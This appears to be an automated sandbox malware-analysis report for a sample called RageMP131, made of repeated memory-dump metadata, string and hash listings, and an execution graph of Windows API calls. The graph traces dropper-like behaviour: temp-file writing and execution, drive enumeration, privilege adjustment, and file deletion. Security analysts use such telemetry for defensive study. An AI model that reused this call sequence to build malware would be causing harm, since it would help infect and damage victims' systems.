                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy$___std_exception_copy
                                      • String ID: recursive_directory_iterator::operator++
                                      • API String ID: 1206660477-953255998
                                      • Opcode ID: 90e6da59351aeae158e6f0b831ddc9f4bdeae71c7804ff1bc68928d95c93b48b
                                      • Instruction ID: 08413dfb8df63a52a0f7290efaedbc90f32e6a05fbc46551035d60027a64b002
                                      • Opcode Fuzzy Hash: 90e6da59351aeae158e6f0b831ddc9f4bdeae71c7804ff1bc68928d95c93b48b
                                      • Instruction Fuzzy Hash: 77E1F4B09006049FDB18DF98D845FAEBBFAFF44300F14461DE456A7B82E774AA44CBA5
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C86DE
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C86ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: at line $, column
                                      • API String ID: 4194217158-191570568
                                      • Opcode ID: 3abd2d2db09439d41dfa4d24e2551be5fce5a0e639af3d2d13fac6acfa9eed87
                                      • Instruction ID: c64b09841dabcf670b657a8fb7792b1431763f6087eccbf2f57a40131b36d04f
                                      • Opcode Fuzzy Hash: 3abd2d2db09439d41dfa4d24e2551be5fce5a0e639af3d2d13fac6acfa9eed87
                                      • Instruction Fuzzy Hash: BB612A71D002049FDB08DFA8DC85BADBFB6FF55310F14861CE415A7782EBB4AA848B95
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C3C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1866435925
                                      • Opcode ID: e7aa58ccd639f3b69575b4ff2b2e8298f6b6753b5afca5eaefd30c7e45ebe9bd
                                      • Instruction ID: e8e903cddf8186aec111858d7a7d358ad1ec778b584b44c964f13b0e482ae77d
                                      • Opcode Fuzzy Hash: e7aa58ccd639f3b69575b4ff2b2e8298f6b6753b5afca5eaefd30c7e45ebe9bd
                                      • Instruction Fuzzy Hash: 4011D1B29007086FC710DF98D806F9ABBADAB05310F04852EFA5897641FB70A904CB91
                                      Strings
                                      • unordered_map/set too long, xrefs: 006321D3
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: unordered_map/set too long
                                      • API String ID: 0-306623848
                                      • Opcode ID: 53c603eceb749b7c565c211117a2a1a9a2a405b5bc9ada22e866407674cd9958
                                      • Instruction ID: 95e91ff012c5345b21686b1f9fa9293adedc9e5cc57e7d2f3423838f9a687f74
                                      • Opcode Fuzzy Hash: 53c603eceb749b7c565c211117a2a1a9a2a405b5bc9ada22e866407674cd9958
                                      • Instruction Fuzzy Hash: A5E1B071A006069FCB18DF68C991AA9B7F6FF49310F14826DE8199B391E730ED55CBD0
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C844D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: parse error$ror
                                      • API String ID: 2659868963-4201802366
                                      • Opcode ID: a0098d55dd1c083c1c2f729ad8c7438881c24250b2c32c1ac14e3f38714bdc69
                                      • Instruction ID: 853fd2fd5c5519cad413f7c0fc1f0d17086b4acb7703937a64e8715e1cee8822
                                      • Opcode Fuzzy Hash: a0098d55dd1c083c1c2f729ad8c7438881c24250b2c32c1ac14e3f38714bdc69
                                      • Instruction Fuzzy Hash: 1EC10471D006498FDB08CFA8CC85BADBBB6FF55304F14825CE405AB792DB74AA84CB91
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C8A93
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C8C71
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ange
                                      • API String ID: 2659868963-4159947239
                                      • Opcode ID: c97f711525860b6c149d4e664d6dfab6ed1e04df121322745797c397ce94cf6a
                                      • Instruction ID: 0c6b5584b240c17f2822e1b3ad8adc163248b61b1ba50006c93a1b53cf9148c3
                                      • Opcode Fuzzy Hash: c97f711525860b6c149d4e664d6dfab6ed1e04df121322745797c397ce94cf6a
                                      • Instruction Fuzzy Hash: 1AB1F271C002488FDB08CFA8CC84BADFBB5FF59314F14871DE4156B692EBB4A9848B55
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C8051
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 005C8060
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: [json.exception.
                                      • API String ID: 4194217158-791563284
                                      • Opcode ID: 8129629462bd598b26ff5f41f0916f311fade4723931467bcb99b4b4f3c7dda8
                                      • Instruction ID: 739ac8b6f9e0a082b8453ba1c7ec58e03e0489634cb541a9d70c331ff0b448d4
                                      • Opcode Fuzzy Hash: 8129629462bd598b26ff5f41f0916f311fade4723931467bcb99b4b4f3c7dda8
                                      • Instruction Fuzzy Hash: 6191FB719002089FDB18CFA8CC85FAEBFB6FF55310F14825DE411AB692D7749A84CB95
                                      APIs
                                      • ___std_exception_copy.LIBVCRUNTIME ref: 005C3C0F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_copy
                                      • String ID: ios_base::badbit set$ios_base::failbit set
                                      • API String ID: 2659868963-1240500531
                                      • Opcode ID: 5254c821322bde3c842bb2106ec825458c8925b9d569efacf8b48082ed2e1729
                                      • Instruction ID: da3b1ba33f1753143414024fba99a0588d353f96338eb558944ca793f97c8aae
                                      • Opcode Fuzzy Hash: 5254c821322bde3c842bb2106ec825458c8925b9d569efacf8b48082ed2e1729
                                      • Instruction Fuzzy Hash: 0541D3B5900608AFCB04DF98CC45FAABBB9FF45310F14822EF91497681E774AA40CBA5
                                      APIs
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006340B9
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 006340D2
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00634BDD
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 00634BF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ___std_exception_destroy
                                      • String ID: value
                                      • API String ID: 4194217158-494360628
                                      • Opcode ID: a438e1bbe23aab0210299f31f41dd09c181986313d9492769b458beb0a95371d
                                      • Instruction ID: f7314916dd665d094b646be539a6baeb3f1de86f4bb2489a4800a81684d31477
                                      • Opcode Fuzzy Hash: a438e1bbe23aab0210299f31f41dd09c181986313d9492769b458beb0a95371d
                                      • Instruction Fuzzy Hash: 0051A1B0C00258DBDF14DFA4CC89BDEFBB6AF05304F14425DE445A7382DB746A888B95
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00638D11
                                      Strings
                                      • type must be string, but is , xrefs: 00638D78
                                      • type must be boolean, but is , xrefs: 00638E02
                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.4126953813.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 005C0000, based on PE: true
                                      • Associated: 0000000E.00000002.4126745484.00000000005C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4126953813.00000000006F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127773976.00000000006F6000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000006FC000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.000000000087B000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.0000000000962000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A0000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009A9000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4127850873.00000000009B7000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130092361.00000000009B8000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130510288.0000000000B5C000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130562864.0000000000B5D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130609798.0000000000B60000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 0000000E.00000002.4130659784.0000000000B61000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_14_2_5c0000_RageMP131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID: type must be boolean, but is $type must be string, but is
                                      • API String ID: 118556049-436076039
                                      • Opcode ID: 961aae2fde3eddf42346dcc0b0977d26401771992a11de07f0bd65e574c78bd0
                                      • Instruction ID: 249041ac510b7200d517c3c378caea50c10c8fc366fc07cbf57b6fd2f4ef2e44
                                      • Opcode Fuzzy Hash: 961aae2fde3eddf42346dcc0b0977d26401771992a11de07f0bd65e574c78bd0
                                      • Instruction Fuzzy Hash: 223127B5900288AFDB14EBA4D846FEDB7AAEF11700F10056CF41597782EF34AA44CB96

                                      Execution Graph

                                      Execution Coverage:26.2%
                                      Dynamic/Decrypted Code Coverage:10.4%
                                      Signature Coverage:0%
                                      Total number of Nodes:299
                                      Total number of Limit Nodes:14
                                      execution_graph 1013 e314e1 1014 e31541 1013->1014 1015 e314fd GetModuleHandleA 1013->1015 1018 e31573 1014->1018 1021 e31549 1014->1021 1016 e31512 1015->1016 1017 e3151a VirtualQuery 1015->1017 1016->1014 1017->1016 1026 e31638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1018->1026 1020 e31569 1021->1020 1023 e31557 1021->1023 1022 e31579 ExitProcess 1042 e31af9 1023->1042 1027 e3167a 1026->1027 1028 e3167f 1026->1028 1066 e3139f GetVersionExA 1027->1066 1048 e31718 GetSystemTimeAsFileTime 1028->1048 1031 e31686 1032 e316ca 1031->1032 1035 e316a0 CreateThread 1031->1035 1033 e316d0 1032->1033 1034 e316d7 1032->1034 1060 e31581 1033->1060 1037 e316d5 1034->1037 1038 e316dd lstrcpy 1034->1038 1053 e32c48 memset 1035->1053 1298 e31099 1035->1298 1037->1022 1038->1022 1041 e31718 3 API calls 1041->1032 1043 e31b11 1042->1043 1044 e31b09 1042->1044 1045 e31b16 CreateThread 1043->1045 1047 e31566 1043->1047 1046 e31638 188 API calls 1044->1046 1045->1047 1317 e31638 189 API calls 1045->1317 1046->1047 1047->1020 1049 e31735 SHSetValueA 1048->1049 1050 e31754 1048->1050 1052 e31786 __aulldiv 1049->1052 1051 e3175a SHGetValueA 1050->1051 1050->1052 1051->1052 1052->1031 1087 e31973 PathFileExistsA 1053->1087 1056 e32cb2 1057 e32cbb VirtualFree 1056->1057 1058 e316ba WaitForSingleObject 1056->1058 1057->1058 1058->1041 1059 e32c8f CreateThread WaitForMultipleObjects 1059->1056 1109 e32b8c memset GetLogicalDriveStringsA 1059->1109 1278 e3185b GetSystemTimeAsFileTime srand rand srand rand 1060->1278 1062 e31592 wsprintfA wsprintfA lstrlen CreateFileA 1063 e31633 1062->1063 1064 e315fb WriteFile CloseHandle 1062->1064 1063->1037 1064->1063 1065 e3161d ShellExecuteA 1064->1065 1065->1063 1067 e314da 1066->1067 1068 e313cf LookupPrivilegeValueA 1066->1068 1067->1028 1069 e313ef 1068->1069 1070 e313e7 1068->1070 1069->1067 1284 e3120e GetModuleHandleA GetProcAddress 1069->1284 1279 e3119f GetCurrentProcess OpenProcessToken 1070->1279 1076 e31448 GetCurrentProcessId 1076->1067 1077 e31457 1076->1077 1077->1067 1078 e31319 3 API calls 1077->1078 1079 e3147f 1078->1079 1080 e31319 3 API calls 1079->1080 1081 e3148e 1080->1081 1081->1067 1082 e31319 3 API calls 1081->1082 1083 e314b4 1082->1083 1084 e31319 3 API calls 1083->1084 1085 e314c3 1084->1085 1086 e31319 3 API calls 1085->1086 1086->1067 1088 e319a0 1087->1088 1089 e31ac7 1087->1089 1090 e319af CreateFileA 1088->1090 1089->1056 1089->1059 1091 e319c4 Sleep 1090->1091 1092 e31a28 GetFileSize 1090->1092 1091->1090 1093 e319d5 1091->1093 1094 e31a80 1092->1094 1095 e31a38 1092->1095 1108 e3185b GetSystemTimeAsFileTime srand rand srand rand 1093->1108 1096 e31a96 1094->1096 1097 e31a8d FindCloseChangeNotification 1094->1097 1095->1094 1099 e31a3d VirtualAlloc 1095->1099 1100 e31aad 1096->1100 1107 e31a9c DeleteFileA 1096->1107 1097->1096 1099->1094 1105 e31a53 1099->1105 1100->1089 1106 e31ab8 VirtualFree 1100->1106 1101 e319da wsprintfA CopyFileA 1101->1092 1104 e31a0d CreateFileA 1101->1104 1102 e31a59 ReadFile 1102->1094 1102->1105 1104->1092 1104->1107 1105->1094 1105->1102 